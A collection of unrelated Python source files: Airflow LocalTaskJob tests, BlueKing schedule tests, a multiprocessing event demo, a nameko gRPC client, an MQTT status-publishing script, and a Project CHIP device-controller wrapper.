from airflow.utils.state import State
from tests.compat import patch
from tests.test_core import TEST_DAG_FOLDER
from tests.test_utils.db import clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_runs()
patcher = patch('airflow.jobs.base_job.sleep')
self.addCleanup(patcher.stop)
self.mock_base_job_sleep = patcher.start()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@patch('os.getpid')
def test_heartbeat_failed_fast(self, mock_getpid):
"""
Test that task heartbeat will sleep when it fails fast
"""
mock_getpid.return_value = 1
self.mock_base_job_sleep.side_effect = time.sleep
with create_session() as session:
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
self.assertGreater(len(heartbeat_records), 2)
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
self.assertGreaterEqual((time2 - time1).total_seconds(), job.heartrate)
@unittest.skipIf('mysql' in conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
def test_localtaskjob_maintain_heart_rate(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
self.assertEqual(mock_start.call_count, 1)
self.assertEqual(mock_ret_code.call_count, 2)
time_end = time.time()
self.assertEqual(self.mock_base_job_sleep.call_count, 1)
self.assertEqual(job1.state, State.SUCCESS)
# Consider we have patched sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already make sure patched sleep call is only called once
self.assertLess(time_end - time_start, job1.heartrate)
session.close()
|
test_schedule.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import threading
from django.test import TransactionTestCase
from bamboo_engine.eri.models import Schedule, ScheduleType
from pipeline.eri.models import Schedule as DBSchedule
from pipeline.eri.imp.schedule import ScheduleMixin
class ScheduleMixinTestCase(TransactionTestCase):
def setUp(self):
self.mixin = ScheduleMixin()
self.process_id = 99
self.node_id = "nid"
self.version = "v1"
self.schedule_type = ScheduleType.POLL
self.schedule = DBSchedule.objects.create(
process_id=self.process_id, node_id=self.node_id, version="v2", type=self.schedule_type.value
)
def test_set_schedule(self):
schedule = self.mixin.set_schedule(
process_id=self.process_id, node_id=self.node_id, version=self.version, schedule_type=self.schedule_type
)
schedule_model = DBSchedule.objects.get(id=schedule.id)
        self.assertTrue(isinstance(schedule, Schedule))
self.assertEqual(schedule.id, schedule_model.id)
self.assertEqual(schedule.type, self.schedule_type)
self.assertEqual(schedule.process_id, self.process_id)
self.assertEqual(schedule.node_id, self.node_id)
self.assertEqual(schedule.finished, False)
self.assertEqual(schedule.expired, False)
self.assertEqual(schedule.version, self.version)
self.assertEqual(schedule.times, 0)
self.assertEqual(schedule_model.type, self.schedule_type.value)
self.assertEqual(schedule_model.process_id, self.process_id)
self.assertEqual(schedule_model.node_id, self.node_id)
self.assertEqual(schedule_model.finished, False)
self.assertEqual(schedule_model.expired, False)
self.assertEqual(schedule_model.scheduling, False)
self.assertEqual(schedule_model.version, self.version)
self.assertEqual(schedule_model.schedule_times, 0)
def test_get_schedule(self):
schedule = self.mixin.get_schedule(self.schedule.id)
self.assertTrue(isinstance(schedule, Schedule))
self.assertEqual(schedule.id, self.schedule.id)
self.assertEqual(schedule.type, ScheduleType(self.schedule.type))
self.assertEqual(schedule.process_id, self.schedule.process_id)
self.assertEqual(schedule.node_id, self.schedule.node_id)
self.assertEqual(schedule.finished, self.schedule.finished)
self.assertEqual(schedule.expired, self.schedule.expired)
self.assertEqual(schedule.version, self.schedule.version)
self.assertEqual(schedule.times, self.schedule.schedule_times)
def test_get_schedule_with_node_and_version(self):
schedule = self.mixin.get_schedule_with_node_and_version(self.schedule.node_id, self.schedule.version)
self.assertTrue(isinstance(schedule, Schedule))
self.assertEqual(schedule.id, self.schedule.id)
self.assertEqual(schedule.type, ScheduleType(self.schedule.type))
self.assertEqual(schedule.process_id, self.schedule.process_id)
self.assertEqual(schedule.node_id, self.schedule.node_id)
self.assertEqual(schedule.finished, self.schedule.finished)
self.assertEqual(schedule.expired, self.schedule.expired)
self.assertEqual(schedule.version, self.schedule.version)
self.assertEqual(schedule.times, self.schedule.schedule_times)
def test_get_schedule_with_node_and_version_not_exist(self):
self.assertRaises(
DBSchedule.DoesNotExist, self.mixin.get_schedule_with_node_and_version, self.schedule.node_id, "not_exist",
)
def test_apply_schedule_lock(self):
schedule_count = 10
lock = threading.Lock()
res = {False: 0, True: 0}
def target(schedule_id):
success = self.mixin.apply_schedule_lock(schedule_id)
lock.acquire()
res[success] += 1
lock.release()
threads = [threading.Thread(target=target, args=(self.schedule.id,)) for i in range(schedule_count)]
for t in threads:
t.start()
for t in threads:
t.join(1)
self.schedule.refresh_from_db()
self.assertTrue(self.schedule.scheduling)
self.assertEqual(res[False], schedule_count - 1)
self.assertEqual(res[True], 1)
def test_apply_schedule_lock__all_fail(self):
self.schedule.scheduling = True
self.schedule.save()
schedule_count = 10
lock = threading.Lock()
res = {False: 0, True: 0}
def target(schedule_id):
success = self.mixin.apply_schedule_lock(schedule_id)
lock.acquire()
res[success] += 1
lock.release()
threads = [threading.Thread(target=target, args=(self.schedule.id,)) for i in range(schedule_count)]
for t in threads:
t.start()
for t in threads:
t.join(1)
self.schedule.refresh_from_db()
self.assertTrue(self.schedule.scheduling)
self.assertEqual(res[False], schedule_count)
self.assertEqual(res[True], 0)
def test_release_schedule_lock(self):
self.schedule.scheduling = True
self.schedule.save()
schedule_count = 10
def target(schedule_id):
self.mixin.release_schedule_lock(schedule_id)
threads = [threading.Thread(target=target, args=(self.schedule.id,)) for i in range(schedule_count)]
for t in threads:
t.start()
for t in threads:
t.join(1)
self.schedule.refresh_from_db()
self.assertFalse(self.schedule.scheduling)
def test_expire_schedule(self):
self.assertFalse(self.schedule.expired)
self.mixin.expire_schedule(self.schedule.id)
self.schedule.refresh_from_db()
self.assertTrue(self.schedule.expired)
def test_finish_schedule(self):
self.assertFalse(self.schedule.finished)
self.mixin.finish_schedule(self.schedule.id)
self.schedule.refresh_from_db()
self.assertTrue(self.schedule.finished)
def test_add_schedule_times(self):
self.assertEqual(self.schedule.schedule_times, 0)
self.mixin.add_schedule_times(self.schedule.id)
self.mixin.add_schedule_times(self.schedule.id)
self.mixin.add_schedule_times(self.schedule.id)
self.schedule.refresh_from_db()
self.assertEqual(self.schedule.schedule_times, 3)
|
dev_mp.py
|
import multiprocess as mp
import time
def foo_one(eve1, eve2):
print("Foo one is boosting")
time.sleep(5)
    eve1.set()  # Signal foo_two()
    eve2.wait()  # Wait for foo_two() to finish boosting
print("Foo one is running")
return None
def foo_two(eve1, eve2):
print("Foo two is boosting")
time.sleep(10)
    eve2.set()  # Signal foo_one()
    eve1.wait()  # Wait for foo_one() to finish boosting
print("Foo two is running")
return None
if __name__ == '__main__':
eve1 = mp.Event()
eve2 = mp.Event()
p1 = mp.Process(target = foo_one, args = [eve1, eve2])
p2 = mp.Process(target = foo_two, args = [eve1, eve2])
p1.start()
p2.start()
p1.join()
p2.join()
print("foo_one and foo_two finish")
|
client.py
|
# -*- coding: utf-8 -*-
import itertools
import socket
import threading
import time
from collections import deque
from logging import getLogger
from urllib.parse import urlparse
from grpc import StatusCode
from h2.errors import ErrorCodes
from nameko_grpc.compression import SUPPORTED_ENCODINGS, UnsupportedEncoding
from nameko_grpc.connection import ConnectionManager
from nameko_grpc.constants import Cardinality
from nameko_grpc.context import metadata_from_context_data
from nameko_grpc.errors import GrpcError
from nameko_grpc.inspection import Inspector
from nameko_grpc.streams import ReceiveStream, SendStream
from nameko_grpc.timeout import bucket_timeout
log = getLogger(__name__)
USER_AGENT = "grpc-python-nameko/0.0.1"
class ClientConnectionManager(ConnectionManager):
"""
An object that manages a single HTTP/2 connection on a GRPC client.
Extends the base `ConnectionManager` to make outbound GRPC requests.
"""
def __init__(self, sock):
super().__init__(sock, client_side=True)
self.pending_requests = deque()
self.counter = itertools.count(start=1, step=2)
def on_iteration(self):
""" On each iteration of the event loop, also initiate any pending requests.
"""
self.send_pending_requests()
super().on_iteration()
def send_request(self, request_headers):
""" Called by the client to invoke a GRPC method.
Establish a `SendStream` to send the request payload and `ReceiveStream`
for receiving the eventual response. `SendStream` and `ReceiveStream` are
returned to the client for providing the request payload and iterating
over the response.
Invocations are queued and sent on the next iteration of the event loop.
"""
stream_id = next(self.counter)
request_stream = SendStream(stream_id)
response_stream = ReceiveStream(stream_id)
self.receive_streams[stream_id] = response_stream
self.send_streams[stream_id] = request_stream
request_stream.headers.set(*request_headers)
self.pending_requests.append(stream_id)
return request_stream, response_stream
def response_received(self, event):
""" Called when a response is received on a stream.
If the headers contain an error, we should raise it here.
"""
super().response_received(event)
stream_id = event.stream_id
response_stream = self.receive_streams.get(stream_id)
if response_stream is None:
self.conn.reset_stream(stream_id, error_code=ErrorCodes.PROTOCOL_ERROR)
return
headers = response_stream.headers
if int(headers.get("grpc-status", 0)) > 0:
error = GrpcError.from_headers(headers)
response_stream.close(error)
def trailers_received(self, event):
""" Called when trailers are received on a stream.
If the trailers contain an error, we should raise it here.
"""
super().trailers_received(event)
stream_id = event.stream_id
response_stream = self.receive_streams.get(stream_id)
if response_stream is None:
self.conn.reset_stream(stream_id, error_code=ErrorCodes.PROTOCOL_ERROR)
return
trailers = response_stream.trailers
if int(trailers.get("grpc-status", 0)) > 0:
error = GrpcError.from_headers(trailers)
response_stream.close(error)
def send_pending_requests(self):
""" Initiate requests for any pending invocations.
Sends initial headers and any request data that is ready to be sent.
"""
while self.pending_requests:
stream_id = self.pending_requests.popleft()
log.debug("initiating request, new stream %s", stream_id)
# send headers immediately rather than waiting for data. this ensures
# streams are established with increasing stream ids regardless of when
# the request data is available
self.send_headers(stream_id, immediate=True)
self.send_data(stream_id)
def send_data(self, stream_id):
try:
super().send_data(stream_id)
except UnsupportedEncoding:
response_stream = self.receive_streams[stream_id]
request_stream = self.send_streams[stream_id]
error = GrpcError(
status=StatusCode.UNIMPLEMENTED,
details="Algorithm not supported: {}".format(request_stream.encoding),
)
response_stream.close(error)
request_stream.close()
class Future:
def __init__(self, response_stream, output_type, cardinality):
self.response_stream = response_stream
self.output_type = output_type
self.cardinality = cardinality
def initial_metadata(self):
return self.response_stream.headers.for_application
def trailing_metadata(self):
return self.response_stream.trailers.for_application
def result(self):
response = self.response_stream.consume(self.output_type)
if self.cardinality in (Cardinality.STREAM_UNARY, Cardinality.UNARY_UNARY):
response = next(response)
return response
class Method:
def __init__(self, client, name, context_data=None):
self.client = client
self.name = name
self.context_data = context_data or {}
def __call__(self, request, **kwargs):
return self.future(request, **kwargs).result()
def future(self, request, timeout=None, compression=None, metadata=None):
inspector = Inspector(self.client.stub)
cardinality = inspector.cardinality_for_method(self.name)
input_type = inspector.input_type_for_method(self.name)
output_type = inspector.output_type_for_method(self.name)
service_name = inspector.service_name
compression = compression or self.client.default_compression
if compression not in SUPPORTED_ENCODINGS:
log.warning(
"Invalid compression algorithm: '{}'. Ignoring.".format(compression)
)
compression = self.client.default_compression
request_headers = [
(":method", "POST"),
(":scheme", "http"),
(":authority", urlparse(self.client.target).hostname),
(":path", "/{}/{}".format(inspector.service_name, self.name)),
("te", "trailers"),
("content-type", "application/grpc+proto"),
("user-agent", USER_AGENT),
("grpc-encoding", compression),
("grpc-message-type", "{}.{}".format(service_name, input_type.__name__)),
("grpc-accept-encoding", ",".join(SUPPORTED_ENCODINGS)),
]
if metadata is not None:
metadata = metadata[:]
else:
metadata = []
metadata.extend(metadata_from_context_data(self.context_data))
for key, value in metadata:
request_headers.append((key, value))
if timeout is not None:
request_headers.append(("grpc-timeout", bucket_timeout(timeout)))
if cardinality in (Cardinality.UNARY_UNARY, Cardinality.UNARY_STREAM):
request = (request,)
response_stream = self.client.invoke(request_headers, request, timeout)
return Future(response_stream, output_type, cardinality)
class Proxy:
def __init__(self, client):
self.client = client
def __getattr__(self, name):
return Method(self.client, name)
class Client:
""" Standalone GRPC client that uses native threads.
"""
manager = None
sock = None
def __init__(
self, target, stub, compression_algorithm="none", compression_level="high"
):
self.target = target
self.stub = stub
self.compression_algorithm = compression_algorithm
self.compression_level = compression_level # NOTE not used
def __enter__(self):
return self.start()
def __exit__(self, *args):
self.stop()
@property
def default_compression(self):
if self.compression_algorithm != "none":
return self.compression_algorithm
return "identity"
def start(self):
target = urlparse(self.target)
self.sock = socket.socket()
self.sock.connect((target.hostname, target.port or 50051))
self.manager = ClientConnectionManager(self.sock)
threading.Thread(target=self.manager.run_forever).start()
return Proxy(self)
def stop(self):
if self.manager:
self.manager.stop()
self.sock.close()
def timeout(self, send_stream, response_stream, deadline):
start = time.time()
while True:
elapsed = time.time() - start
if elapsed > deadline:
error = GrpcError(
status=StatusCode.DEADLINE_EXCEEDED, details="Deadline Exceeded"
)
response_stream.close(error)
                send_stream.close()
                break
            time.sleep(0.001)
def invoke(self, request_headers, request, timeout):
send_stream, response_stream = self.manager.send_request(request_headers)
if timeout:
threading.Thread(
target=self.timeout, args=(send_stream, response_stream, timeout)
).start()
threading.Thread(target=send_stream.populate, args=(request,)).start()
return response_stream
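# A minimal usage sketch (hypothetical names: `ExampleStub` and `ExampleRequest`
# stand in for whatever generated protobuf stub and message the caller has; the
# Client, Proxy, Method and Future classes used here are the ones defined above):
#
#   with Client("//localhost:50051", ExampleStub) as proxy:
#       # blocking unary call
#       response = proxy.example_method(ExampleRequest(value="hi"))
#
#       # non-blocking call with a deadline and access to response metadata
#       future = proxy.example_method.future(ExampleRequest(value="hi"), timeout=5.0)
#       print(future.initial_metadata())
#       result = future.result()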
|
paralel_test.py
|
#!/usr/bin/python
#-*- coding: utf-8 -*-
import paho.mqtt.publish as publish
from multiprocessing import Process
import time
import os
import logging
import random
# create logger
logger = logging.getLogger('PSENSv0.1')
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(funcName)s - %(lineno)d - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
def info(title):
logger.debug(title)
logger.debug('debug message')
if hasattr(os, 'getppid'): # only available on Unix
logger.debug( 'parent process : %i', os.getppid())
logger.debug( 'process id: %i', os.getpid())
def logon(org,place,brokerIP,clientId):
logger.debug(logon)
info('logon')
while True:
publish.single(org + "/" + place + "/" + "internal/status/logon" , "0", hostname = brokerIP, client_id= clientId, will=None, auth=None,tls=None)
        logger.debug('Sleeping 1 sec')
time.sleep(1) #seconds
if random.randint(0,5) == 1:
break
def broker(org,place,brokerIP,clientId):
logger.debug(broker)
info('broker')
while True:
publish.single(org + "/" + place + "/" + "internal/status/publish" , "0", hostname = brokerIP, client_id= clientId, will=None, auth=None,tls=None)
        logger.debug('Sleeping 1.5 sec')
time.sleep(1.5) #seconds
if __name__ == '__main__':
info('main line')
p = Process(target=logon, args=('sens.solutions','pool','84.88.95.122','Raspi1'))
p.start()
o = Process(target=broker, args=('sens.solutions','pool','84.88.95.122','Raspi2'))
o.start()
while True:
        if not p.is_alive():
            logger.warning('logon is DEAD - Restarting it')
            # A terminated or finished Process object cannot be restarted;
            # create and start a fresh one instead.
            p = Process(target=logon, args=('sens.solutions', 'pool', '84.88.95.122', 'Raspi1'))
            p.start()
            logger.warning("New PID: " + str(p.pid))
        if o.is_alive():
            pass
            #logger.debug('broker is alive? %s', str(o.is_alive()))
        else:
            logger.warning('broker is DEAD - Restarting it')
            # start() can only be called once per Process object, so build a new one.
            o = Process(target=broker, args=('sens.solutions', 'pool', '84.88.95.122', 'Raspi2'))
            o.start()
        time.sleep(0.5)  # avoid busy-waiting while supervising the workers
p.join()
o.join()
|
ChipDeviceCtrl.py
|
#
# Copyright (c) 2020 Project CHIP Authors
# Copyright (c) 2019-2020 Google, LLC.
# Copyright (c) 2013-2018 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# Python interface for Chip Device Manager
#
"""Chip Device Controller interface
"""
from __future__ import absolute_import
from __future__ import print_function
import time
from threading import Thread
from ctypes import *
from .ChipStack import *
import enum
__all__ = ["ChipDeviceController"]
_CompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_ErrorFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_ulong, POINTER(DeviceStatusStruct))
_GetBleEventFunct = CFUNCTYPE(c_void_p)
_WriteBleCharacteristicFunct = CFUNCTYPE(
c_bool, c_void_p, c_void_p, c_void_p, c_void_p, c_uint16
)
_SubscribeBleCharacteristicFunct = CFUNCTYPE(
c_bool, c_void_p, c_void_p, c_void_p, c_bool
)
_CloseBleFunct = CFUNCTYPE(c_bool, c_void_p)
# typedef void (*OnConnectFunct)(Chip::DeviceController::hipDeviceController * dc, chip::Transport::PeerConnectionState * state,
# void * appReqState);
# typedef void (*OnErrorFunct)(Chip::DeviceController::ChipDeviceController * dc, void * appReqState, CHIP_ERROR err,
# const Inet::IPPacketInfo * pi);
# typedef void (*OnMessageFunct)(Chip::DeviceController::ChipDeviceController * dc, void * appReqState, PacketBuffer * buffer);
_OnConnectFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p)
_OnRendezvousErrorFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint32, c_void_p)
_OnMessageFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p)
# This is a fix for WEAV-429. Jay Logue recommends revisiting this at a later
# date to allow for truly multiple instances so this is temporary.
def _singleton(cls):
instance = [None]
def wrapper(*args, **kwargs):
if instance[0] is None:
instance[0] = cls(*args, **kwargs)
return instance[0]
return wrapper
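# For illustration only (hypothetical class): decorating with _singleton makes
# repeated constructor calls return the same instance.
#
#   @_singleton
#   class _Example(object):
#       pass
#
#   assert _Example() is _Example()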
class DCState(enum.IntEnum):
NOT_INITIALIZED = 0
IDLE = 1
BLE_READY = 2
RENDEZVOUS_ONGOING = 3
RENDEZVOUS_CONNECTED = 4
@_singleton
class ChipDeviceController(object):
def __init__(self, startNetworkThread=True):
self.state = DCState.NOT_INITIALIZED
self.devCtrl = None
self.networkThread = None
self.networkThreadRunable = False
self._ChipStack = ChipStack()
self._dmLib = None
self._InitLib()
devCtrl = c_void_p(None)
res = self._dmLib.nl_Chip_DeviceController_NewDeviceController(pointer(devCtrl))
if res != 0:
raise self._ChipStack.ErrorToException(res)
pairingDelegate = c_void_p(None)
res = self._dmLib.nl_Chip_ScriptDevicePairingDelegate_NewPairingDelegate(pointer(pairingDelegate))
if res != 0:
raise self._ChipStack.ErrorToException(res)
res = self._dmLib.nl_Chip_DeviceController_SetDevicePairingDelegate(devCtrl, pairingDelegate)
if res != 0:
raise self._ChipStack.ErrorToException(res)
self.devCtrl = devCtrl
self.pairingDelegate = pairingDelegate
self._ChipStack.devCtrl = devCtrl
self.blockingCB = None # set by other modules(BLE) that require service by thread while thread blocks.
self.cbHandleBleEvent = (
None # set by other modules (BLE) that provide event callback to Chip.
)
self.cbHandleBleWriteChar = None
self.cbHandleBleSubscribeChar = None
self.cbHandleBleClose = None
def DeviceCtrlHandleMessage(appReqState, buffer):
pass
self.cbHandleMessage = _OnMessageFunct(DeviceCtrlHandleMessage)
def HandleRendezvousError(appState, reqState, err, devStatusPtr):
if self.state == DCState.RENDEZVOUS_ONGOING:
print("Failed to connect to device: {}".format(err))
self._ChipStack.callbackRes = True
self._ChipStack.completeEvent.set()
elif self.state == DCState.RENDEZVOUS_CONNECTED:
print("Disconnected from device")
self.cbHandleRendezvousError = _OnRendezvousErrorFunct(HandleRendezvousError)
if startNetworkThread:
self.StartNetworkThread()
self.state = DCState.IDLE
def __del__(self):
if self.devCtrl != None:
            self._dmLib.nl_Chip_DeviceController_DeleteDeviceController(self.devCtrl)
self.devCtrl = None
def DriveBleIO(self):
# perform asynchronous write to pipe in IO thread's select() to wake for BLE input
res = self._dmLib.nl_Chip_DeviceController_WakeForBleIO()
if res != 0:
raise self._ChipStack.ErrorToException(res)
def SetBleEventCB(self, bleEventCB):
if self.devCtrl != None:
self.cbHandleBleEvent = _GetBleEventFunct(bleEventCB)
self._dmLib.nl_Chip_DeviceController_SetBleEventCB(self.cbHandleBleEvent)
def SetBleWriteCharCB(self, bleWriteCharCB):
if self.devCtrl != None:
self.cbHandleBleWriteChar = _WriteBleCharacteristicFunct(bleWriteCharCB)
self._dmLib.nl_Chip_DeviceController_SetBleWriteCharacteristic(
self.cbHandleBleWriteChar
)
def SetBleSubscribeCharCB(self, bleSubscribeCharCB):
if self.devCtrl != None:
self.cbHandleBleSubscribeChar = _SubscribeBleCharacteristicFunct(
bleSubscribeCharCB
)
self._dmLib.nl_Chip_DeviceController_SetBleSubscribeCharacteristic(
self.cbHandleBleSubscribeChar
)
def SetBleCloseCB(self, bleCloseCB):
if self.devCtrl != None:
self.cbHandleBleClose = _CloseBleFunct(bleCloseCB)
self._dmLib.nl_Chip_DeviceController_SetBleClose(self.cbHandleBleClose)
def StartNetworkThread(self):
if self.networkThread != None:
return
def RunNetworkThread():
while self.networkThreadRunable:
self._ChipStack.networkLock.acquire()
self._dmLib.nl_Chip_DeviceController_DriveIO(50)
self._ChipStack.networkLock.release()
time.sleep(0.005)
self.networkThread = Thread(target=RunNetworkThread, name="ChipNetworkThread")
self.networkThread.daemon = True
self.networkThreadRunable = True
self.networkThread.start()
def IsConnected(self):
return self._ChipStack.Call(
lambda: self._dmLib.nl_Chip_DeviceController_IsConnected(self.devCtrl)
)
def ConnectBle(self, bleConnection):
self._ChipStack.CallAsync(
lambda: self._dmLib.nl_Chip_DeviceController_ValidateBTP(
self.devCtrl,
bleConnection,
self._ChipStack.cbHandleComplete,
self._ChipStack.cbHandleError,
)
)
def Connect(self, connObj, setupPinCode):
def HandleComplete(dc, connState, appState):
print("Rendezvoud Complete")
self.state = DCState.RENDEZVOUS_CONNECTED
self._ChipStack.callbackRes = True
self._ChipStack.completeEvent.set()
onConnectFunct = _OnConnectFunct(HandleComplete)
self.state = DCState.RENDEZVOUS_ONGOING
return self._ChipStack.CallAsync(
lambda: self._dmLib.nl_Chip_DeviceController_Connect(self.devCtrl, connObj, setupPinCode, onConnectFunct, self.cbHandleMessage, self.cbHandleRendezvousError)
)
def Close(self):
self._ChipStack.Call(
lambda: self._dmLib.nl_Chip_DeviceController_Close(self.devCtrl)
)
def SetLogFilter(self, category):
        if category < 0 or category > pow(2, 8) - 1:
raise ValueError("category must be an unsigned 8-bit integer")
self._ChipStack.Call(
lambda: self._dmLib.nl_Chip_DeviceController_SetLogFilter(category)
)
def GetLogFilter(self):
self._ChipStack.Call(
lambda: self._dmLib.nl_Chip_DeviceController_GetLogFilter()
)
def SetBlockingCB(self, blockingCB):
self._ChipStack.blockingCB = blockingCB
def SetWifiCredential(self, ssid, password):
ret = self._dmLib.nl_Chip_ScriptDevicePairingDelegate_SetWifiCredential(self.pairingDelegate, ssid.encode("utf-8"), password.encode("utf-8"))
if ret != 0:
            raise self._ChipStack.ErrorToException(ret)
# ----- Private Members -----
def _InitLib(self):
if self._dmLib is None:
self._dmLib = CDLL(self._ChipStack.LocateChipDLL())
self._dmLib.nl_Chip_DeviceController_NewDeviceController.argtypes = [
POINTER(c_void_p)
]
self._dmLib.nl_Chip_DeviceController_NewDeviceController.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_DeleteDeviceController.argtypes = [
c_void_p
]
self._dmLib.nl_Chip_DeviceController_DeleteDeviceController.restype = (
c_uint32
)
self._dmLib.nl_Chip_DeviceController_Close.argtypes = [c_void_p]
self._dmLib.nl_Chip_DeviceController_Close.restype = None
